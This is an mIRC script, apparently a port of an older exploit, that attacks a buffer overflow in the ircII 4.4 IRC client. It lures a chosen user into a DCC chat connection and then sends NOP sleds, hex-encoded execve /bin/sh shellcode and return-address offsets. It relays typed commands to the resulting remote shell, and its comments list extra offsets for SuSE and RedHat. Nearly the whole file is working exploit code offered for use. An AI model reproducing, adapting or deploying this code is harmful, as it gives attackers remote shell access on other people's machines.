ide_expl.mrc

`; ide_expl.mrc: vade79 -> _v9[[email protected]], www.fakehalo.org.  
;  
; ircii-4-4 exploit->ported to mirc5.7, works reverse to ircii-4.4.c. You send the chat  
; request instead of having them chat you, result is the same.  
;  
; Wrote directly from ircii-4.4.c(for *nix), that someone gave me to port to mirc.  
;  
; Exploit to overflow a buffer. Although, more often than not it will crash/seg fault  
; with both versions of this exploit, by default offsets. (exploit noted as being for  
; V4.4, and patched in V4.4M)  
;  
; ircii-4.4.c by: bladi & aLmUDeNa.  
; ide_expl.mrc(this) by: _v9(vade79).  
;  
; Also included in the exploit(ircii4.4.c) were some other offsets:  
;  
; "SuSe 6.x :0xbfffe3ff"  
; "RedHat :0xbfffe888"  
;  
; To load this script into mIRC5.7: /load -rs <path/to/file.mrc>  
;  
; NOTE: While making this i noticed /sockwrite had some problems catching up on checking to see if  
; the connection still exists, so if you see a /sockwrite error in the status window, the user  
; probably seg faulted.  
  
alias -l bin {  
if ($len($1) != 2) { return }  
var %i, %j, %k  
if ($left($1,1) !isnum) { %i = $calc($asc($left($1,1)) -87)) }  
else { %i = $left($1,1) }  
if ($right($1,1) !isnum) { %j = $calc($asc($right($1,1)) -87)) }  
else { %j = $right($1,1) }  
while (%i) { %k = %k + 16 | dec %i }  
return $calc(%k + %j)  
}  
alias -l make_string {  
var %i = 1, %j  
while ($gettok($replace($1,\x,\),0,92) >= %i) {  
%j = %j $bin($gettok($replace($1,\x,\),%i,92))  
inc %i  
}  
return %j  
}  
alias -l wn return @ircii4.4_dcc_exploit  
alias -l sw {  
if ($2) {  
if ($sock(exp_ide).status != active) {   
if ($window($wn)) { window -c $wn }  
echo -a Connection lost/non-existant. ( $+ %ide.status $+ )  
}  
else {  
if ($window($wn)) { titlebar $wn $chr(91) data sent to socket(last): $1- $chr(93) }  
sockwrite $1-  
}  
}  
}  
alias -l main {  
if ($window($wn)) { window -c $wn } | window -aek $wn  
echo $wn *** [01]: sending DCC chat request, waiting...  
set %ide.nick $1 | set %ide.port $rand(1024,4096)  
while ($portfree(%ide.port) != $true) { set %ide.port $rand(1024,4096) }  
sockclose exp_ide_base | socklisten exp_ide_base %ide.port  
.quote privmsg $1 : $+ $chr(1) $+ DCC CHAT chat $longip($ip) %ide.port $+ $chr(1)  
}  
alias exploit_ircii {  
if ($server) {  
if ($window($wn)) { echo -a *** Close the exploit window before attempting to exploit. | halt }  
elseif ($version < 5.7) { echo -a *** Functions in this script require mIRC5.7 or greater. (aborted) | halt }  
elseif ($1) { main $1 }  
else { echo -a Syntax: /exploit_ircii <nick> }  
}  
}  
on 1:SOCKREAD:exp_ide: {  
if ($sockerr > 0) return  
:read  
sockread %data  
if ($sockbr == 0) return  
if (%data == $null) var %data = (no data)  
if ($window($wn)) { echo $wn -> %data }  
goto read  
}  
on 1:SOCKLISTEN:exp_ide_base: {   
sockclose exp_ide | sockaccept exp_ide | sockclose exp_ide_base  
unset %ide.status  
if ($window($wn)) {  
set %ide.status 0  
echo $wn *** [02]: connected, setting up binary variables. (nops/shell code/etc)  
bset &nops 1 $make_string(\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90)  
bset &o 1 $make_string(\xff\xbf\xff\xe3)  
; ^- try different offsets here.  
bset &shellcode 1 $make_string(\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff)  
bset -t &shellcode $calc($bvar(&shellcode,0) +1) /bin/sh  
echo $wn *** [03]: attempting to overflow buffer, sending the variables. (nops/shell code/etc)  
inc %ide.status  
echo $wn *** [--]: * (1/4) sending the nops, looping 47 times.  
var %i = 0  
while (%i < 47) {   
sw exp_ide &nops  
inc %i   
}  
inc %ide.status  
echo $wn *** [--]: * (2/4) sent, now sending the shell code.  
sw exp_ide &shellcode   
%i = 0 | while (%i < 9999) { inc %i }  
inc %ide.status  
echo $wn *** [--]: * (3/4) sent, now waiting/continuing, looping 299 times.  
%i = 0  
while (%i < 299) {  
var %j = 0 | while (%j < 499) { inc %j }  
var %j = 1  
while ($bvar(&o,%j)) {   
bset &bit 1 $bvar(&o,%j)  
sw exp_ide &bit  
inc %j  
}  
inc %i  
}  
inc %ide.status  
echo $wn *** [--]: * (4/4) sent, done.  
}  
else { sockclose exp_ide }  
}  
on 1:SOCKCLOSE:exp_ide: {  
if ($window($wn)) { window -c $wn }  
echo -a *** Connection lost with %ide.nick $+ . ( $+ %ide.status $+ )  
unset %ide.*  
}  
on 1:CLOSE:@: {   
if ($target == $wn) {  
if ($sock(exp_ide)) { sockclose exp_ide }  
if ($sock(exp_ide_base)) { sockclose exp_ide_base }  
unset %ide.*  
}  
}  
on 1:INPUT:@: {  
if ($active == $wn) {  
if ($sock(exp_ide).status == active) {  
if (%ide.status != 4) { echo *** Error, status is not at 4 yet, wait for completion. }  
else { echo $wn <- $1- | sw -n exp_ide $1- }  
}  
else { echo $wn *** Error, socket status isn't online yet. }  
halt  
}  
}  
on 1:LOAD: {  
if ($version < 5.7) { echo -a *** Functions in this script( $+ $nopath($script) $+ ) require mIRC5.7 or greater. (aborted) | .unload -rs $script | halt }  
else { echo -a *** Loaded $nopath($script) $+ , syntax is: /exploit_ircii <nick>. }  
}  
`